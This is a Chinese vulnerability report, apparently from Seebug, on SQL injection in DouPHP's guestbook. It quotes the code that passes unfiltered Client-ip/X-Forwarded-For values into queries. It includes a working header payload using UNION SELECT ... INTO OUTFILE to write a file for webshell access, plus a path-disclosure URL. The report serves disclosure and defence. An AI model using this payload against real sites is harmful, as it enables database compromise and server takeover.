DouPHP SQL注入一枚

### 简要描述： 注入 ### 详细说明： 依然是get_ip的问题， guestbook.php:102行 ``` if ($rec == 'insert') { /* 跨站请求伪造CSRF的防御 */ if ($firewall->check_token($_POST['token'])) { /* html安全过滤器 */ $_POST = $firewall->dou_filter($_POST); $ip = $dou->get_ip(); $add_time = time(); $vcode = $check->is_captcha($_POST['vcode']) ? strtoupper($_POST['vcode']) : ''; /* 检查IP是否频繁留言 */ if(is_water($ip)) $dou->dou_msg($_LANG['guestbook_is_water'], $url); /* 如果限制必须输入中文则修改错误提示 */ $include_chinese = $_CFG['guestbook_check_chinese'] ? $_LANG['guestbook_include_chinese'] : ''; /* 验证主题 */ if (!$check->guestbook($_POST['title'], 70)) { $wrong['title'] = preg_replace('/d%/Ums', $include_chinese, $_LANG['guestbook_title_wrong']); } /* 验证联系人 */ if (!$check->guestbook($_POST['name'], 30)) { $wrong['name'] = preg_replace('/d%/Ums', $include_chinese, $_LANG['guestbook_name_wrong']); } /* 验证回复方式 */ if (empty($_POST['contact_type'])) { $wrong['contact'] = $_LANG['guestbook_contact_type_empty']; } elseif (stripos($_POST['contact_type'], 'mail')) { if(!$check->is_email($_POST['contact'])) $wrong['contact'] = $_LANG['guestbook_email_wrong']; } else { if(!$check->is_number($_POST['contact'])) { stripos($_POST['contact_type'], 'qq') ? $wrong['contact'] = $_LANG['guestbook_qq_wrong'] : $wrong['contact'] = $_LANG['guestbook_tel_wrong']; } } /* 验证留言内容 */ if (!$check->guestbook($_POST['content'], 300)) { $wrong['content'] = preg_replace('/d%/Ums', $include_chinese, $_LANG['guestbook_content_wrong']); } /* 判断验证码 */ if($_CFG['captcha'] && md5($vcode . DOU_SHELL) != $_SESSION['captcha']) { $wrong['vcode'] = $_LANG['captcha_wrong']; } if($wrong) { $_SESSION['wrong'] = $wrong; $_SESSION['post'] = $_POST; header('Location: ' . $url); exit(); } else { $sql = "INSERT INTO " . $dou->table('guestbook') . " (id, title, name, contact_type, contact, content, ip, add_time)" . " VALUES (NULL, '$_POST[title]', '$_POST[name]', '$_POST[contact_type]', '$_POST[contact]', '$_POST[content]', '$ip', '$add_time')"; $dou->query($sql); $dou->dou_msg($_LANG['guestbook_insert_success'], $url); } } else { /* CSRF非法操作提示 */ $dou->dou_msg($_LANG['illegal'], $url); } } /** +---------------------------------------------------------- * 防灌水 +---------------------------------------------------------- */ function is_water($ip) { $unread_messages = $GLOBALS['dou']->get_one("SELECT COUNT(*) FROM " . $GLOBALS['dou']->table('guestbook') . " WHERE ip = '$ip' AND if_read = '0'"); /* 如果管理员未回复的留言数量大于3 */ if ($unread_messages >= '3') return true; } ``` 基于ip判断是否灌水，同时$ip无过滤带入select查询 include/common.class.php:122行 ``` function get_ip() { static $ip; if (isset ($_SERVER)) { if (isset ($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else if (isset ($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } else { $ip = $_SERVER["REMOTE_ADDR"]; } } else { if (getenv("HTTP_X_FORWARDED_FOR")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); } else if (getenv("HTTP_CLIENT_IP")) { $ip = getenv("HTTP_CLIENT_IP"); } else { $ip = getenv("REMOTE_ADDR"); } } return $ip; } ``` ip可以从Client-ip获得，并且毫无过滤 [<img src="https://images.seebug.org/upload/201407/021103058726697c17d5ff6083df4fcad277f522.png" alt="QQ20140702-1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/021103058726697c17d5ff6083df4fcad277f522.png) [<img src="https://images.seebug.org/upload/201407/02110318ecf7acf43296f7d0c44d673e530fe1ee.png" alt="QQ20140702-2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/02110318ecf7acf43296f7d0c44d673e530fe1ee.png) 如果当前数据库用户具有写权限，配合爆路径还可以getshell, ``` http://localhost/DouPHPhttps://images.seebug.org/upload/include/smarty/Smarty_Compiler.class.php ``` [<img src="https://images.seebug.org/upload/201407/0211053136ac7aa4c05868e37109651628bdc021.png" alt="QQ20140702-3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/0211053136ac7aa4c05868e37109651628bdc021.png) ``` Client-ip: 127.0.0.1' union select version() into outfile 'C:/AppServ/www/DouPHPhttps://images.seebug.org/upload/test.php'# ``` [<img src="https://images.seebug.org/upload/201407/021108118fac857213691ed1ec9fb3a0b64345b3.png" alt="QQ20140702-4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/021108118fac857213691ed1ec9fb3a0b64345b3.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201407/021103058726697c17d5ff6083df4fcad277f522.png" alt="QQ20140702-1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/021103058726697c17d5ff6083df4fcad277f522.png) [<img src="https://images.seebug.org/upload/201407/02110318ecf7acf43296f7d0c44d673e530fe1ee.png" alt="QQ20140702-2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/02110318ecf7acf43296f7d0c44d673e530fe1ee.png) [<img src="https://images.seebug.org/upload/201407/0211053136ac7aa4c05868e37109651628bdc021.png" alt="QQ20140702-3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/0211053136ac7aa4c05868e37109651628bdc021.png) [<img src="https://images.seebug.org/upload/201407/021108118fac857213691ed1ec9fb3a0b64345b3.png" alt="QQ20140702-4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/021108118fac857213691ed1ec9fb3a0b64345b3.png)